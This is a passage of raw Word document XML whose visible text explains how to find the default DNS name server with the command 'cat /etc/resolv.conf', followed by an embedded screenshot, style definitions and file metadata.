      <w:r w:rsidRPr="00140519">
        <w:t>In order to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00140519">
        <w:t xml:space="preserve"> identify the default DNS name server address, we can run the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6749911A" w14:textId="77777777" w:rsidR="00140519" w:rsidRPr="00140519" w:rsidRDefault="00140519" w:rsidP="00140519">
      <w:r w:rsidRPr="00140519">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C5070C9" w14:textId="77777777" w:rsidR="00140519" w:rsidRPr="00140519" w:rsidRDefault="00140519" w:rsidP="00140519">
      <w:r w:rsidRPr="00140519">
        <w:t>cat /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00140519">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00140519">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00140519">
        <w:t>resolv.conf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="05037670" w14:textId="3A263227" w:rsidR="00140519" w:rsidRPr="00140519" w:rsidRDefault="00140519" w:rsidP="00140519">
      <w:r w:rsidRPr="00140519">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="15881E8E" wp14:editId="139D5C75">
            <wp:extent cx="5943600" cy="2515870"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1628463416"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nten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15870"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA22785" w14:textId="77777777" w:rsidR="00140519" w:rsidRDefault="00140519"/>
    <w:sectPr w:rsidR="00140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15"/>
    <w:rsid w:val="00140519"/>
    <w:rsid w:val="00551663"/>
    <w:rsid w:val="00562D15"/>
    <w:rsid w:val="00595B1E"/>
    <w:rsid w:val="00853ABF"/>
    <w:rsid w:val="00CB6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297F"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{1A75B5B8-73CE-4638-AEA2-35031C4B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D15"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="00562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D15"/>
    <w:pPr>
      <w:spacing w:before="160"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="QuoteChar">
    <w:name w:val="Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Quote"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="00562D15"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00562D15"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="00562D15"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IntenseQuote">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="IntenseQuoteChar"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="00562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D15"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="00562D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466</Words>
  <Characters>2665</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>66</Lines>
  <Paragraphs>61</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2025-12-19T19:01:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-12-19T19:03:00Z</dcterms:modified>
</cp:coreProperties>
</file>